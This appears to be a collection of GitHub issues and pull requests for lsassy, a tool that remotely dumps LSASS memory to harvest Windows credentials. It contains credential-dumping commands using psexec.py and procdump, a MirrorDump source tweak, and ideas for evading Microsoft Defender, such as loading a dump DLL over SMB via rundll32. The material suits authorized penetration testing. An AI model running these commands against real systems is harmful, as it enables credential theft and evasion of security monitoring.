Probably not a bug and more likely a mis-usage of my part but I could not find much info.

I am executing the following command:

lsassy -d SomeDomain -u SomeAdminUser -p SomePassword 10.0.2.4

But I am getting the following error: [X] [10.0.2.4] Either lsass is protected or target might be slow or procdump/dumpert wasn't provided

Also, tried adding -m with 0-5 and providing prodump and dumpert but still getting the same error.

If I log into machine 10.0.2.4, I can dump lsass using prodump or taskmgr.

I can't find a good way to automatically generate builds when I release a new version. If someone knows how to do this, help would be really appreciated 🤗

Hi @Hackndo!

In this PR I'd like to bring the mirrordump dump method based on the MirrorDump awesome tool by @CCob. For quite a long time it has been my personal tool of choice for offensive engagements, and I think it should definitely be a part of your great toolkit.

Before compiling MirrorDump a tiny modification should be made to the source code (Program.cs file) for lsassy to successfully parse the output. By default MirrorDump creates a zip file containing the dump, so the modification changes the output to raw dump bytes:

static void SaveDump(string fileName, DumpContext dc)
{
    using (var fileStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite))
    {
        fileStream.Write(dc.Data, 0, (int)dc.Size);
    }
}

...

//SaveZip(fileName, MiniDumpToMem.GetDumpContextFromHandle(MagicHandle));
SaveDump(fileName, MiniDumpToMem.GetDumpContextFromHandle(MagicHandle));

I've also made an attempt to create a module with embedded assembly of MirrorDump.exe, but I've faced the following issue: due to a relatevily big size of the assembly (Boo compiler is inside) ImpacketFile.create_file does not transfer the whole file and stops at length of 1,024 Kbytes. I suppose it has something to do with the MAX_FILE_WRITE constant (not sure).

If you have any idea of how to corretly resolve the issue, I'll be happy to update the PR!

Usage example:

~$ lsassy -vv -u administrator -p 'Passw0rd!' 10.10.13.37 -m mirrordump -O mirrordump_path=./MirrorDump.exe

P. S. I'm sure you will compile the project by yourself for the security purposes, but I shall attach the modified assembly in this PR as well for testing - MirrorDump.zip.

Under certain circumstances (e.g. Microsoft Defender active), no dump can be performed with lsassy. This is due to the fact that the dump of the lsass.exe process is considered.

However, the following works:

$ psexec.py host.example.com 'tasklist /fi "imagename eq lsass.exe"'
[CUT]
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
lsass.exe                     1337 Services                   0     49,680 K
[CUT]
$ psexec.py -c procdump64.exe host.example.com '-accepteula -ma 1337 c:\lsass.dmp'
[CUT]
[01:23:45] Dump 1 initiated: c:\lsass.dmp
[CUT]

I don't know whether it would make sense for you to include this bypass in lsassy?

Thanks for your awesome work! :)

First of all Great tool

I got detected by windows defender is there any method that you guys use to bypass it?

i give the tool a try but got flagged by windows defender latest version full patched

Not sure if running in pipenv shell is the issue, but getting the error after a successful dump of lsass.exe:

Detailed error : /bin/sh: 1: lsassy: not found

Thoughts?

Hello! First I would like to say congratulations on the 3.0.0 release, the new improvements look awesome! I had an idea while reading some of the new dumping methods, specifically dumpertdll.

rundll32 can run DLLs from SMB shares, they don't have to be on the disk. My idea was to run an SMB share (like with Samba or impacket-smbshare, not lsassy) and then place the dumpert DLL file in that share. You could then provide the UNC path to the dumpert DLL in the "dumpertdll_path" option, and lsassy would tell rundll32 to call the dumpert DLL from the SMB share, instead of having to upload it.

I've had lots of luck with this method when trying to spawn sliver agents using a DLL loaded from an SMB share, and it would also prevent the OPSEC hit of having to upload the file to disk. Finally, if something goes wrong during the dump (like AV gets wind of what your doing) there is no risk of the dumpert DLL persisting after aborted execution because it couldn't be deleted.

This would cause python to hang when the WMI exec method failed during the program execution (lsassy in CLI or any python code using Lsassy as a lib). That was a funny debugging afternoon 😄

Cheers

Describe the bug Maybe not so much a bug as a desire to see if it would run in WSL. Thinking Windows store apps can be accessed by non-admin users and then install Ubuntu along with lsassy. Should this be a pull request? A little new to the game here but testing my limits.

Expected behavior Here are my steps: Install WSL on Win10 device Install Ubuntu from Windows store Check if Python3 is installed python3 --version Install Python 3 (if needed) sudo apt install python3 Update apt-get sudo apt-get update Install netaddr sudo apt-get install -y python-netaddr Pip3 install netaddr Install pip3 sudo apt-get install python3-pip Install pypykatz pip3 install pypykatz Clone Impacket sudo git clone https://github.com/SecureAuthCorp/impacket.git cd impacket/ sudo python3 setup.py install Install lsassy sudo python3.6 -m pip install lsassy

Screenshots

Additional context The command and results [email protected]:/$ lsassy domain/%username%:%Password%@%FQDN_deviceName Traceback (most recent call last): File "/usr/local/bin/lsassy", line 11, in sys.exit(run()) File "/usr/local/lib/python3.6/dist-packages/lsassy/core.py", line 208, in run targets = get_targets(get_args().target) File "/usr/local/lib/python3.6/dist-packages/lsassy/utils/utils.py", line 134, in get_targets ret_targets += parse_targets(target) File "/usr/local/lib/python3.6/dist-packages/lsassy/utils/utils.py", line 101, in parse_targets t = IPRange(ip_range[0], ip_range[1]) File "/usr/local/lib/python3.6/dist-packages/netaddr/ip/init.py", line 1357, in init self._start = IPAddress(start, flags=flags) File "/usr/local/lib/python3.6/dist-packages/netaddr/ip/init.py", line 280, in init % self.class.name) ValueError: IPAddress() does not support netmasks or subnet prefixes! See documentation for details.

• A task is launched to dump lsass.exe. As long as it is not finished, the dump file is non-existent or empty. This can generate STATUS_OBJECT_NAME_NOT_FOUND errors. Because of this, we have to wait until the task and the write are finished.
• Delete dump file
• More precise logging

Like the -K for kerberos tickets, the new -M stores dumped masterkeys to a file in format {GUID}:SHA1. This format of masterkeys can be use in many tools like SharpDPAPI.